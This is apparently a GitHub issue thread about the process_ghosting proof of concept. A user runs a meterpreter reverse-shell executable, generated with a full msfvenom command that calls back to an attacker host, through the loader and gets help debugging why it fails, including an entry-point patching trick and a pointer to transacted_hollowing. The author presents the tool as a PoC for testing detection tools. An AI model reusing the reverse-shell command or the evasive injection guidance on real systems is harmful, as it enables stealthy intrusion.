Payload doens't fire

[hawaii67]

I created a reverse shell with msfvenom, precisely an exe file, but it won't fire:

'E:\process_ghosting-master\Debug>proc_ghost.exe msf_rev_https.exe
[+] Created temp file: C:\Users\fancy\AppData\Local\Temp\THCFE8.tmp
[+] Information set
[+] Written!
PEB address: 2d7000
ImageBase address: 140000000
[+] Parameters mapped!
PEB address: 2d7000
PEB address: 2d7000
ProcessParameters addr: 0000025FD11A8F30
[+] Process created! Pid = 31e0
EntryPoint at: 140004000
[+] Done!'

The process is created and disappears after a few seconds.

The file msf_rev_https.exe works fine btw.

[hasherezade]

so, the payload runs and terminates? or it crashes? try to debug it and see what is happening inside the payload, maybe it was not able to open a socket or so, and just exited. if it was able to run even for a moment, it means it is not an issue with the loader.

[hawaii67]

The payload ist just doing nothing. I tried to debug of course but I cannot attach to the newly generated process. Error message by X64dbg:

Debugging finished!
Could not get file name from module 2a10!

where 2a10 is the process id

[hasherezade]

please share the payload, and I will test what exactly is going on...

[hawaii67]

Well, I just used a simple
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe
to generate the payload.

PS: Trying with a GUI program as payload like winobj64.exe, it works fine. Using procexp64.exe generates an error message:

Sp obviously the "payload" should fullfill certain criterias............

[hasherezade]

ok, so first of all, regarding the attaching to the child process:

The payload ist just doing nothing. I tried to debug of course but I cannot attach to the newly generated process. Error message by X64dbg:

Debugging finished! Could not get file name from module 2a10!

where 2a10 is the process id

Indeed in case of this technique, as well as in Doppelganging x64dbg does not allow to attach at this stage (before the first thread is run).

But there is a workaround for this, that I helped me debug such processes:

• you need to patch the entry point of the payload: copy two bytes that were at the beginning, and then overwrite them with EB FE (jump to the current line). Thanks to this, you can run the process, but the execution won't go any further.
• run the payload via Ghosting/Doppelganging.
• attach the debugger to the newly created process with the payload.
• Break the execution.
• Go to the Entry Point. Replace the EB FE with the original bytes that you copied in the first step. Set the breakpoint after the replaced code.
• Resume it.

That's how you can follow the execution further.

[hasherezade]

PS: Trying with a GUI program as payload like winobj64.exe, it works fine. Using procexp64.exe generates an error message:

Sp obviously the "payload" should fullfill certain criterias............

This technique, as well as Doppelganging requires manual setup of the full process environment, and many parameters manually: https://github.com/hasherezade/process_ghosting/blob/master/main.cpp#L158
It is quite tedious to implement, and my goal was just to make a PoC on which the detection tools can be tested, so I implemented a minimalist version, without trying to cover all the possible scenarios. It is very much possible that this will cause issues with some payloads, but currently I have other priorities and no time to dedicate making it bulletproof. Feel free to build upon my base and extend it.

[hawaii67]

Thanks for the hints and taking the time to answer.
I already used the EB FE trick and I could follow the whole process in X64dbg. You are right, some parameters have to be set manually. Thanks again, especially for this great PoC.

[hasherezade]

You are welcome, when I will get some free time I will see in details what is missing for this payload to execute completely.

BTW - check also transacted_hollowing - recently I implemented a version that is like a merge with Process Ghosting - uses delete-pending file instead of a transacted file.

https://github.com/hasherezade/transacted_hollowing/blob/main/main.cpp#L14

You can choose which version to build by using a CMake flag:

[hawaii67]

Thanks a lot, transacted_hollowing works like a charm! Awesome work !

[knightswd]

Thanks for the hints and taking the time to answer.
I already used the EB FE trick and I could follow the whole process in X64dbg. You are right, some parameters have to be set manually. Thanks again, especially for this great PoC.

I've had the same problem, but I can't run after I change the process information, and can tell me which one you changed :)

[knightswd]

Thanks for the hints and taking the time to answer.
I already used the EB FE trick and I could follow the whole process in X64dbg. You are right, some parameters have to be set manually. Thanks again, especially for this great PoC.

I changed RtlCreateProcessParametersEX() parameters, but It's not work